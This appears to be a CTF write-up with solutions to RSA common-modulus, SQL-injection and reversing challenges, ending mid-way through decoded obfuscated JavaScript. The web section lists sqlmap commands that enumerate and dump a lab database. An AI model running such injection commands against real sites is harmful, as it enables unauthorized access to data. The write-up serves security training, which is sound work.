108974278939651092492893992673233385779984670314184711139312027264037404795462978337853017972491419588454990015915914688173437472379648582741152541457048843337162825145123822246313801899628596081757531355794108961215283609662532085830785592843935793063170175466335811356201149810220118808692473071471851758359938270315751869316276981818692143247018369451449271065422362681923519494324327423446124684149748126607147156578061248513346930496584118389514049044782348586806953140575243557814659264646177235934995402442686528005511537703747955567158901323507830302645588564433601757858589091770639094625194246846473955607899258941908024132433619382381054635975546735644595518048448831890142969670014496305316039659385903837672953095117049232247849804221598926984914967193068237200224939069428552020912255898593347461051310053072708916269940422440491461041468147301891353890852765051180075075065595639781085297576861876608918621807969748225162937380368062224303524840940402602064749293939448041847324815263141476675420833981900078706211045940321489041228048485919505215826304241790811663170805612121272474198904959089048701389166384392082371553096186983336424123329397769154170956973795635976381852189738982493742235569513623307309490410898,
195328676803092809563564100491672932855551241600172182720504832991482179312050217856517672760318377563436520304815204068904635000379741626239380230617418756995881649346496306969324454331544968901767813625431202856488192606168971829992182410145784596165058119685033694160726676086888209540381952189514446707929667629965129133533413606118245376172698580304587412334624733709106156644677458067759660637678438552462224245011754521090764767068945230686564139636823747903164205802357621670437287259198058975335759056232784674676356003035863991162144301743233735682247897989813359075379131003883145410450881318210835485963839229545925361751058953400868905637849198162572721754263772137419902248879371709338000872593256573787962557322557924614498692240954373463251407799536385188014807774418137730546086635753960034270574331540157782942227500775507797434670956459069871060425368581596885575824659437551725921753934336350715767263080562095286077028644522693098472679543264300298247272798356250912193224468763970680177754535774313196314029857112358922803782360816013106028307281783313150019420876364560453255982777291697216331281039621951935831889170899721217282555097537457431545700301763607940935983567635021643868458571860375807272471454884,
280922912080734476452288688229305464482874667438190141611617250002839700084428489452216395006745608276515631329821303821634158088260519177510304475344181100774620244949106352394485684487285130844449636034900004144662458588388432988547834244129826350278582584639612049923040468401691536388859851832447440096249205297493645828021704216299113799113996399135327470024540594906058983356257544082089173047513179628172164415162467371704287609571058874277277704655915690783219327002368836448869349867459347662686885188005469191581078212378028789732436236760473526242932283524827805726304535381448077435792951908974972640760481791374981080279210268425069355965043104714886295190832516339132193929267291414008595322731707642996989622791762973290913692436810777991034111668164351849144193892665967187306772157948197814843156732207065517336800076471601638418154790370592215507537489897060828118444643056950213752063782709015647652408051511169535102983113030487777297931625743150296135949748119416993438581000993619311412286594807628376834751822180152968417225875972363789543070415811568789022197213025467822222877784028972408025770407845572460257070036508569175645849025798374577174486000827333607013685733054710178468035258602460882493841991172,
119597610400986655822748572704247160378749552140098666928979665264352720818579965218203320626127860188751883851507578788065047673189983865835303769775101052499540654461042578201405519943996655527927432568654121760073883806453560861412045716194359736699664767884153078465566809833379155293675288703558671757572338310811999195499103033933734679490388916618604105253896846501640165766038127605992328516824323561115674741493527578312594272314928734192093252013744776261287377198018059078558877785775180939902670067435362751038547231529527427975202766312364429001266619686629513264874607760353705341075814117498519838829449186475803266347511493093314057394082489334887343697910896126310949379471459274042525273353403965336165896693907451549846915056438525918415860197888166717287251444261156004764238342963446234247692469498495955457564116860046366742203315665220665037378159590091437908369005410113691477805221553491636083039365118757769686187936678492833394541653919831671511456367239093688699015813189744150485962930092183879539404340397488297025103118503268756654960309659736211970446077705669626938922221364040400393261629370608819228139523239965135482093076186223217504520152284433685278728975596909313536355577774263112332303417495,
265574716051316652373725915733039581360767478007355677208862790546517266814175228876617557382345636366171230412704359342480196502313557124468742854845964639446615527297260078648078832479103552945529397702811023160856474548170758601177096109033782738037854491266583450360057709374656043727486579041008033644960633110898088737506337306079170039463060539284596680722984122668138506733044092213040264632377310912338859702542201713722801597383547642873074492695342282229531323404501606329685024697934105397704767634756177550830606943821292323641847550305418002116264481396685159729754699038021974112119007961857750927260165005343668997258556777073319104480913767351824955116406515961360656545696150590230824767818234392390066882108180249123134338522252881513320605843865719891943828694525610308593134095595257601277250095512971878092015641527416283394136605995411555481682062437646304056218813717773853653311982771914013794119770057681075974288994080040296298258197242260030794068770624750073528558655854468311973894900709010410153531963242536694053354460114740002987242912781569628039930451836710678384012266839237618091540990808712674561108617003652864432706686878854194926471413467364273879858306496164438558301944586872526314416436729,
257667709179960565944044186328492807367738944135954847043605212764382832704757417360761494394149259840075003740123177174052228149358818514203318778266531647701104357387731055756642198126158958674918656487262909369809914501090650615710024067892619098640605942423968925529478919228743137244828126157060713277649697565482870319712888771313525525182830544055741056836393661562890441668986775895006750523792997339303390948664379529154621139345761900668182063951765110476182353216412567939479399320617131606239757733838523720350373176371339447546395986226892159729052340263386251815711541426822349762794032005866548317927624214525949088057509495079716595991505466968675343424597967673057981998734607517767663217527777638265694675122968753070313353040479767444588078033182806074868813869650641232713145513611510749341250677135573366310245748508309797568504000893478018992172460072619223216653635059951104765676764262595981718889922618080559279031811463058767163081769501678854750143361230077375266855233524076932053758373299691299836495350858918208667028246552871796016959655328175575388893735202161506889843014300945258983774626428997566550594494105875649585794513909094813481276224437504997908838620440906093212995482890227864482686834190,
141579078248164659336314755581790903129574621785358563404942411832889027612518922843077970313356872708098314876455664277990196359617817343236077780212015726412928497676188115163774425127257561524759706739351055688734989106910467383489150219987041734129315089771609862587179278245998068815418125510778312870401717524959523295014404581149020609122748331349429079925933323418453487827441318667072736406784251846857542799307229563231965689979783481385754192295886669016685545205684049931676515786025123174165776550919656736011753349387875532858914921711407231535957028349182156745115357812608116460300955036029308789535332310917278417257879838400347134132981052282345463764939221065515453883650245991245545685969711331067221340811732118637757477963778774485295938537922318864147098619709636523127851393096174348180584740385495516284017265910448932749623752764252436217250309282113783674781819617117916630265873332129233493942838698537073854211679225599251713850721233668205932087328733513482266425252897096107405838046582457798073440382115284490583075914757656607262849908944027495332015319876753722106977136926354917615739139981712007899956187118822108254300985908728199221729789688355343771714240411144340267691701000569325726600849649,
100706408600125958616560572969447827645492723488680357656944023034538399739316039131511477608424396497504985240518087192341820691309156040173557865161644246030172330845283424397215880348164966399708147484312750461404633620074609510464879736103557969890573629561160496655513618078575574876229586969874915231783440308567697145631208720344817421966156995138024092630329839287981598622829909387496628107522882200612218007935276132288274430206492765043241442366305051357638881722993325504047488900922765366750296035408266424784898424797984918023953193141080617185404158286012068338980093238675383805104814208262220830765204980423273644054614406928753102312502957833868665255709495324999928347484830705882190875038302242159653038677668867695323597848591059767659509170440587343493256508581654455583570681313263289251311969820219946594908769937861909315550223427011196699072141411379931011418416261779511960573911524828019281347396350021592585079371291958989676277950146799107026783446505009215546211243848528990957997259499246021533330488818276943755176641351178947109131074473022313793500525109820926744484848784134455150133347892072036463192078208878984078430050509613362109163470776308853520413494134553520788527165210643113647810496589,
34981384963513076131815472417122245538702789105068221306406727134142930389099428734862694311891228943413212773580114035909562314727781382456014126977818591791289322161963910147483887147052734863940798811502259154628821952700508344620639373437401790884889282919618376779256551828163526573817923243825583451077106224979603217533158277439450241815036457407984580829814025545136980910922892003662836265953193789401675519824453471609823818847330469695357182000796330070038832658418239151887948372131409243514410202596006641703003800685022996642179931329903540845838747865543922540401107486050758928770312566891112859509042558439421819189496977968600766901852596844884584827569574626719419532811668716516566045998056095248077840438584050045411076171369092407022214298278762884213237055585696381071190037564171344508596607067261872983909821105836157242634728458025327055623584965336446710828322609239195998699220816907795139019191499619780142983355297036976617749892226678047108234595124205089865678969515847549155589234025623787336452042816526192405144678899068125774503480629327594356672643117594907235787375069550300836157431308302810943631514521871487875048253747113673958632796475832959056980579822649368226846879825974200976217747711,
188052094573847895353443320101089422934009131511529914800621614889788360489366471014123356068611198436697265642592293438705994280157306755884434062062555897511192911655239912153534425989299815208675196566032489735017173324076268762358113558056588800463694316565281293458626724990449052985584065412267469173963344249026868295925099424637989404141395171480552192659475169492358789922397020410091812256339808139462101037579234818856906786078038004664178348113440160944322490909275995079859736003538861596009947731545923593644074147368603681156913766728849710930897391029520805799170297886035901560720354328801121497942830908897754247093158260715205760336479187352697750548402948926497391262820687181715070225267242781902784881771464965393190091137489807008274170341235018754058708227100521968172472112614024139542148511672090369883055579159150483280047859702113107069145063822076366273741380409559992255810745696026776486789590172676214880183878484309493691587076438455831627777180085114681329695154592837738419276373038438057280459032389795579950086647929180500039243858004612454114104246030389853209524293515867117230877055093292994625394623641233130738307203919315766183207018528307978536002563526915382765707550766239470376319281766,
128047209934897531165640656545265432129228051499097668497556366047958398065650411415679178667994874801183211387584263049558783155175767687238376471410239080112711124265070494253545550677338177794236101154236088426957326670769027325615443788437039101171236214635953405255678812319280348639618370940501270852396503437705371789757438962533876021667231464485728421299638562179997341138328236001424780696712571002135260148519500712362439953653944355027072979814788830783705112200297578557508118083350535342083589595675074346510002454672011201752131446376950924253272419491165736835235206925743817331628994100865143504378023136929659750340651101832064496348352350702376046323276094459942388685382675023183118530352161251133369180852304565111257183512362280542493945792038367777367723291187135549890852439777783176301668783316103120542108214839147707138832048275265262384660908753395891466112378941683412660508097841687284429004366956398803390383786848146420795723276245649798155000506076558805159575568899908133130199217912540344424722548254389192205850179860024715312937155216947617503102080404845966308161835985658840727036320930054409346586143429418685089236924314979718486219096656958761207121613200307960599376376751153525554473307533,
236287727526936694810272614094992980242721693535416926477097033811760002325696040571302711584071552745720524501838734075439505260610094846587110698104370198495320428150883330530044160000718797914162721813131650632467266182927745360511349952800464925619789167066211155698819974555700344338980538992034932465084971019831873882992648582934989970694430975806823718381360139028755494008423203828583616107737184645655736859398213587197019572454522219484310024799997736339888040163613687205738262173205164544103432867359560154903611417409457541590542527918521543456198452927014085894235180824290106779767373064882855272262764598999200526024748196964109545955911014514411069985137943312900718395378413386905365004870600311280657805336349804384633445491202708932616649956955563221525451663402197460448895914438981660613206778572540245823448678395024212618006658385681869524887968993186136893139648284248023600423783302922960152057751131805091718148469820246570202777551312460557159903033720353229268633850274480446367571935085859489343640899825688088579915166107493273469038622840562987271174949658137917542872593944900982943247999140438705810091160619797053905929385570893823862140353534583761732026051569066785734070136821001864045468123610]

def gcd(a, b):
	if a < b:
		a, b = b, a
	while b != 0:
		temp = a % b
		a = b
		b = temp
	return a


def egcd(a, b):
	if a == 0:
		return (b, 0, 1)
	else:
		g, y, x = egcd(b % a, a)
		return (g, x - (b // a) * y, y)

def modinv(a, m):
	g, x, y = egcd(a, m)
	if g != 1:
		raise Exception('modular inverse does not exist')
	else:
		return x % m

# The indices into e and c can be any two of the 32 available
e1 = e[1]
e2 = e[2]
s = egcd(e1,e2)
s1 = s[1]
s2 = s[2]
c1 = c[1]
c2 = c[2]
print(s)
n = 303552029739268787689421034809301542668363111985448197488656603423285809555016225763507821058977191376975609612314573787148430030014978401102426346290180457645094380918591576333426636173812372946449416193133967635136948329497046720932035699306242881374653629170574541376888732480402461582716866722983695803770299355842301744494399283912359159762979974274635961976611573875536934818825542925610132556421395122301055777262562802177229272506178634122630325492174876899080153722085540119976788604275939786645770106319848807686165366996569539304747120908823654505597519971616647713951114166662291810700501111018118275233410176961734636469348235124203204134145130577525538890279384881751619815307136021730662753639447139755612989914958460173737679972680019340240434795555887059008048980208310031478812591690215353375022942428110381458613385128108872115242768135293903468683608857300743326973147004626582751679482312050023468740515408350833053825882533336460567233765353505688832265072613475683680709995436584288121440632015107692526152295970809776420786093311436754175740811154244080248787476374748432605004090718808330731360388760195905565111121494331277093420237515276837204677350020884323188865761880255671146749130841857969707181931683
if s1 < 0:
	s1 = -s1
	c1 = modinv(c1,n)
if s2 < 0:
	s2 = -s2
	c2 = modinv(c2,n)
m = (pow(c1,s1,n)*pow(c2,s2,n)) % n
print(n2s(m))
print(pow(m,e1,n) == c1)
print(pow(m,e2,n) == c2)
#flag{RSA_is_a_popular_algorithm}

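What puzzles me in the end is that the computed m satisfies only one of the two checks; the other is False.

I found a fairly good explanation online; here is the link: http://bobao.360.cn/learning/detail/3058.html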
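The same common-modulus recovery on small constructed parameters, as an added example (Python 3.8+, not the author's script). N, E1, E2 and M are constructed for illustration; the second function shows that a ciphertext variable overwritten with its inverse mod n no longer equals m^e mod n, so a final comparison against it is False even when m is correct.

```python
# Added example: common-modulus recovery of a textbook-RSA plaintext.
# All parameters are small constructed values, not the challenge's numbers.


def egcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def recover(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 mod n and c2 = m^e2 mod n when gcd(e1, e2) == 1.

    With s1*e1 + s2*e2 == 1, c1^s1 * c2^s2 == m^(s1*e1 + s2*e2) == m (mod n).
    A negative exponent makes pow() use the modular inverse (Python 3.8+);
    it raises ValueError if the ciphertext is not invertible mod n.
    The caller's c1 and c2 are left untouched.
    """
    g, s1, s2 = egcd(e1, e2)
    if g != 1:
        raise ValueError("exponents must be coprime")
    return pow(c1, s1, n) * pow(c2, s2, n) % n


def checks_after_overwrite(n, e1, c1, e2, c2):
    """Same recovery, but the ciphertext paired with a negative coefficient
    is replaced by its inverse before the final comparison.

    Returns (m, check1, check2). The check that uses the replaced value
    compares m^e against c^-1 instead of c, so it is False although m is right.
    """
    _, s1, s2 = egcd(e1, e2)
    if s1 < 0:
        s1, c1 = -s1, pow(c1, -1, n)
    if s2 < 0:
        s2, c2 = -s2, pow(c2, -1, n)
    m = pow(c1, s1, n) * pow(c2, s2, n) % n
    return m, pow(m, e1, n) == c1, pow(m, e2, n) == c2


# Constructed sample: one modulus, one message, two coprime public exponents.
N = 61 * 53
E1, E2 = 17, 257
M = 1234
C1, C2 = pow(M, E1, N), pow(M, E2, N)

if __name__ == "__main__":
    m = recover(N, E1, C1, E2, C2)
    print(m, pow(m, E1, N) == C1, pow(m, E2, N) == C2)
    print(checks_after_overwrite(N, E1, C1, E2, C2))
```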

Web

0x06 Sql50

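The simplest kind of sqlmap injection. That evening I was still trying to inject by hand, which was painful.

The payloads are as follows: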

py -2 sqlmap.py -u 10.4.21.55:10010?id=1
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 --dbs
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 -D cunliyougeguniangtajiaochutian --tables
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 -D cunliyougeguniangtajiaochutian --tables -T Marinata --columns
py -2 sqlmap.py -u 10.4.21.55:10010?id=1 -D cunliyougeguniangtajiaochutian --tables -T Marinata --columns -C Hinata --dump
flag{Power_of_Ldy}

Re

0x07 re100

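A simple reversing task. At the time my main problem was not taking that OR seriously... I had not seen OR operations much, so I was not very alert to it.

Logic: flag + 9 = ( (key&0xAA) >> 1 ) | ( 2 * (key&0x55) )

The script is as follows: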

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
a = [0x8F,0xAA,0x85,0xA0,0x48,0xAC,0x40,0x95,0xB6,0x16,0xBE,0x40,0xB4,0x16,0x97,0xB1,0xBE,0xBC,0x16,0xB1,0xBC,0x16,0x9D,0x95,0xBC,0x41,0x16,0x36,0x42,0x95,0x95,0x16,0x40,0xB1,0xBE,0xB2,0x16,0x36,0x42,0x3D,0x3D,0x49]
flag = ''
# Swap each pair of adjacent bits (0xAA selects the odd bits, 0x55 the even bits), then subtract 9
for i in range(len(a)):
    flag += chr( (((a[i]&0xAA)>>1) | (2*(a[i]&0x55))) - 9 )
print(flag)
#FLAG{Swap two bits is easy 0xaa with 0x55}

0x08 re200

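I heard that F5 does not work?! Only afterwards did I learn that it can be repaired the same way as in the last hctf.

Method 1: repair F5

The key function is check, and it is exactly the one that cannot be decompiled with F5, as shown in the figure below.

On the line marked in red, press the D key, and that is all.

Method 2: follow straight to strcmp in gdb

Since there is a comparison function at the end, a breakpoint can be set at strcmp; the address is 0x4006B6, i.e. check+112.

Then run, and after entering a sufficiently long string the flag is directly visible.

Method 3: step through in gdb.

Stepping shows that the input string is XORed with 1, 2, 4, 6 and so on before being matched against the target string, so a script recovers the flag.

The script is as follows: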

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
a = [0x66,0x6E,0x65,0x61,0x73,0x42,0x6D,0x78,0x75,0x4D,0x61,0x49,0x6C,0x68,0x75,0x7B,0x44,0x7D,0x63,0x62,0x6A,0x15,0x51]
flag = ''
# Byte i of the target string is XORed with 2*i
for i in range(len(a)):
    flag += chr( a[i]^(2*i) )
print(flag)
#flag{Have_u_tried_GDB?}

0x09 re300 (JS encryption and obfuscation)

First, format the code at http://matthewfl.com/unPacker.html, which gives:

console.log((function () {
    if (typeof(require) == 'undefined') return '(´・ω・`)';
    var code = require('process').argv[2];
    if (!code) return '(´・ω・`)';
    // Left-pad a hex string with zeros to length l
    String.prototype.zpad = function (l) {
        return this.length < l ? '0' + this.zpad(l - 1) : this
    };
    // Map each character code e to (e*0xb1+0x1b)&0xff and emit it as a \uXXXX escape
    function encrypt(data) {
        return '"' + (Array.prototype.slice.call(data)
            .map((e) => e.charCodeAt(0))
            .map((e) => (e * 0xb1 + 0x1b) & 0xff)
            .map((e) => '\\u' + e.toString(16).zpad(4))).join('') + '"'
    }
    // author's placeholder for the long encrypted string
    var crypted = "balabalabalayidachuan";
    if (JSON.parse(encrypt(code)) != crypted) return '(´・ω・`)';
    try {
        eval(code)
    } catch (e) {
        return '(´・ω・`)'
    }
    return '(*´∀`)~♥'
})())

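The key code is here: (e)=>(e*0xb1+0x1b)&0xff

In other words, the flag goes through a multiplication and an addition, and then the low eight bits are kept to form the encrypted string. Reversing that directly is not possible, so brute-force it.

The script is as follows: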

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
a = [0xff,0xff,0xff,0x48,0x39,0x06,0x68,0xe6,0xff,0xff,0xff,0x48,0x26,0xca,0xca,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xff,0xff,0x35,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xca,0xca,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xff,0xca,0x35,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xca,0xff,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xff,0xff,0x35,0xc3,0x26,0x88,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xff,0xff,0xca,0xff,0x35,0xc3,0xff,0xff,0xff,0x06,0xff,0xff,0xff,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xca,0xff,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xff,0xca,0x35,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xff,0xca,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xca,0xca,0x35,0xc3,0x26,0x88,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0x68,0x87,0xff,0xff,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xff,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xca,0xca,0x35,0xd6,0xd6,0xff,0xff,0xff,0x87,0xff,0xca,0xca,0xff,0x35,0xd6,0xd6,0xff,0xff,0xff,0x88,0xe6,0xff,0xff,0xff,0xe9,0xff,0xca,0x48,0xc3,0xff,0xff,0xff,0xe9,0xff,0xca,0x48,0xff,0xff,0xff,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0x68,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xca,0xff,0x48,0xff,0xff,0xff,0xe9,0xff,0xca,0x06,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0x68,0x74,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xff,0xff,0x48,0xc3,0xff,0xff,0xff,0xe9,0xff,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0x68,0x74,0xd6,0xc3,0xc3,0xec,0xff,0xff,0xff,0x74,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0x68,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xca,0xca,0x48,0xff,0xff,0xff,0xe9,0xff,0xca,0x06,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0x68,0x74,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xff,0x48,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0x68,0x74,0xd6,0xc3,0xff,0xff,0xff,0xe9,0xca,0x48,0xc3,
0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0x68,0x74,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0x68,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xe6,0xff,0xff,0xff,0xe9,0xff,0xff,0x48,0xff,0xff,0xff,0xe9,0xff,0xd6,0xc3,0xec,0x9d,0x9d,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0x68,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xe6,0xff,0xff,0xff,0xe9,0xff,0x48,0xc3,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0x74,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0x68,0x06,0xff,0xff,0xff,0xe9,0xff,0xca,0x68,0xe6,0xff,0xff,0xff,0xe9,0xff,0xc3,0xff,0xff,0xff,0xe9,0xff,0xc3,0xff,0xff,0xff,0xe9,0xff,0xff,0xd6,0x9d,0xb7,0x9d,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0x68,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xca,0xd6,0x9d,0xe9,0x9d,0xd6,0xc3,0xec,0x06,0x68,0xd6,0x9d,0x9d,0x74,0x06,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0x68,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xd6,0x9d,0xc3,0xb7,0xb7,0xb7,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,
0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xd6,0x9d,0x26,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xca,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0x9d,0xb7,0xb7,0x9d,0xd6,0xff,0xff,0xff,0xe9,0xca,0xca,0xff,0xd6,0xff,0xff,0xff,0xe9,0xff,0xff,0xca,0xd6,0xff,0xff,0xff,0xe9,0xca,0xff,0xff,0xd6,0x9d,0x88,0xb7,0xb7,0xb7,0x9d,0x74,0xe6,0x9d,0xd6,0x9d,0xb7,0x9d,0x9d,0x74,0xc3,0x74,0x74,0xc3,0x74,0xe6]
flag = []
for i in range(256):
	for j in range(256):
		if (( j*0xb1 + 0x1b )&0xff) == i:
			flag.append(j)
			break
flag1 = ''
for i in a:
	flag1 += chr( flag[i] )
print(len(a),len(flag1))
print(flag1)

This gives:

$$$=~[];$$$={___:++$$$,$$$$:(![]+"")[$$$],__$:++$$$,$_$_:(![]+"")[$$$],_$_:++$$$,$_$$:({}+"")[$$$],$$_$:($$$[$$$]+"")[$$$],_$$:++$$$,$$$_:(!""+"")[$$$],$__:++$$$,$_$:++$$$,$$__:({}+"")[$$$],$$_:++$$$,$$$:++$$$,$___:++$$$,$__$:++$$$};$$$.$_=($$$.$_=$$$+"")[$$$.$_$]+($$$._$=$$$.$_[$$$.__$])+($$$.$$=($$$.$+"")[$$$.__$])+((!$$$)+"")[$$$._$$]+($$$.__=$$$.$_[$$$.$$_])+($$$.$=(!""+"")[$$$.__$])+($$$._=(!""+"")[$$$._$_])+$$$.$_[$$$.$_$]+$$$.__+$$$._$+$$$.$;$$$.$$=$$$.$+(!""+"")[$$$._$$]+$$$.__+$$$._+$$$.$+$$$.$$;$$$.$=($$$.___)[$$$.$_][$$$.$_];$$$.$($$$.$($$$.$$+"""+$$$.$$__+$$$._$+"\"+$$$.__$+$$$.$_$+$$$.$$_+"\"+$$$.__$+$$$.$$_+$$$._$$+$$$._$+(![]+"")[$$$._$_]+$$$.$$$_+"."+(![]+"")[$$$._$_]+$$$._$+"\"+$$$.__$+$$$.$__+$$$.$$$+"(\"\"+$$$.__$+$$$.___+$$$.$$_+"\"+$$$.__$+$$$.__$+$$$.$__+"\"+$$$.__$+$$$.___+$$$.__$+"\"+$$$.__$+$$$.___+$$$.$$$+"{\"+$$$.__$+$$$.__$+$$$._$_+"\"+$$$.__$+$$$._$_+$$$._$$+"\"+$$$.$__+$$$.___+"\"+$$$.__$+$$$.___+$$$.$_$+"\"+$$$.__$+$$$.$_$+$$$.$$_+$$$.$$__+$